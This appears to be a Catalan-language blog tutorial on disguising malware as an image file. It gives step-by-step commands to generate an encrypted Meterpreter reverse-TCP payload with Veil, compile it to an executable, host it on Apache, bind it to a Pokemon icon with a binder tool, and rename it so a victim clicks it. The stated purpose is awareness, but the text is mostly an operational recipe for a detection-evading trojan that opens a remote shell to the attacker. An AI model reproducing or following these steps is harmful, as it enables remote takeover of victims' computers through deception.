Com amagar un payload sota una imatge
Si recordeu, en un post anterior amagàvem un missatge xifrat sota una imatge i es va quedar una pregunta en l’aire:
És possible fer que una imatge contingui un payload i que en fer clic sobre la mateixa aquesta s’executi? La resposta la podreu descobrir a través d’aquest petit i interessant manual sobre com amagar un payload sota una imatge. Espero que us agradi.
He realitzat aquest post amb l’objectiu que pogueu veure i aprengueu a quina classe de perills estem exposats i com els “dolents“ poden colar-se com si fos un cavall de Troia, simplement amb una imatge.
Per Fernando Manrique
Bones camaleons digitals,
Per a realitzar aquesta operació farem servir kali per a indexar el payload i windows per a amagar el mateix sota una imatge.
Actualització del sistema kali:
sudo apt-get update && sudo apt-get upgrade
Generació payload amb veil ens permet utilitzar un ncrypter:
veil
Fem servir la opció 1 (evasió)
use 1
Podem veure que tenim 41 tipos de payloads carregats.
Farem servir la comanda list per veure la llista de payloads carregats i escollir el que volem fer servir.
use list
Seleccionem l’opció 28 (python/meterpreter/rev_tcp.py), ja que la majoria dels sistemes a comprometre el deixen passar sense problemes.
use 28
Ens mostrarà les opcions a configurar el payload, de les quals haurem que conformar les següents opcions:
➡️ LHOST: <ip atacante>
➡️ LPORT: <puerto de escucha>
➡️ USE_PYHERION: <encrypter>
Nota: si després de fer això us genera error en generar el payload, s’ha de fer el següent canvi en la versió del perfil:
# vi /usr/share/veil/config/setup.sh Change line 587 to: sudo -u "${trueuser}" WINEPREFIX="${winedir}" wine "${winedir}/drive_c/Python34/python.exe" "-m" "pip" "install" "-Iv" "pefile==2019.4.18" # vi /usr/share/veil/tools/evasion_common/encryption.py
Change line 21to:
aes_cipher_object = AES.new(random_aes_key.encode('utf-8'), AES.MODE_CBC, iv.encode('utf-8')) # veil --setup again.
Asegúrate de tener los privilegions necesarios para poder generar el fichero de salida:
#sudo chown root:root -R /var/lib/veil/wine
Crearem el payload executable amb la opción PyInstaller per defecte, això fa que encara que no estigui a la màquina víctima python, aquest s’executi igualment.
Per a aquest cas el fitxer que ens interessa és el següent:
Executable written to: /var/lib/veil/output/compiled/poke3.exe
Passem el payload a windows:
Aixequem el servei de Apache:
service apache2 start service apache2 status
Movem el fitxer generat a /var/www/html
mv /var/lib/veil/output/compiled/poke3.exe /var/www/html
Descarreguem l’arxiu en Windows:
Una vegada descarregat el payload i amb el programa Rescue Hacker desarem l’arxiu després d’una imatge, de tal manera que quan li arribi a la víctima i premi sobre la imatge per a engrandir-la, aquesta s’executi automaticamente:
- Amb el programa toYcon convertim una imatge triada a tipus ico, en el meu cas he seleccionat la següent imatge de Pokemon seguint així amb l’anterior publicació.
El programa toYcon ens genera una caixa on haurem de situar la imatge i automàticament se’ns generarà la imatge de tipus ico.
- Amb el programa Rescue Hacker anidarem el payload a aquesta.
Nota: Hem de guardar amb la extensió de .exe
Com podem veure a les propietats de la imatge que ha generat i ja no és .ico si no .exe.
Modifiquem el nom del mateix perquè aparegui la icona, fent-lo així encara més creïble per a la víctima. Amb la imatge selecionada premem F2 i després d’això al principi del nom afegim install_
Oh, Oh, Oh, ho hem aconseguit, felicitats!!!
Moltes gràcies #CamaleonesDigitales per la vostra atenció, espero que us hagi resultat interessant l’article!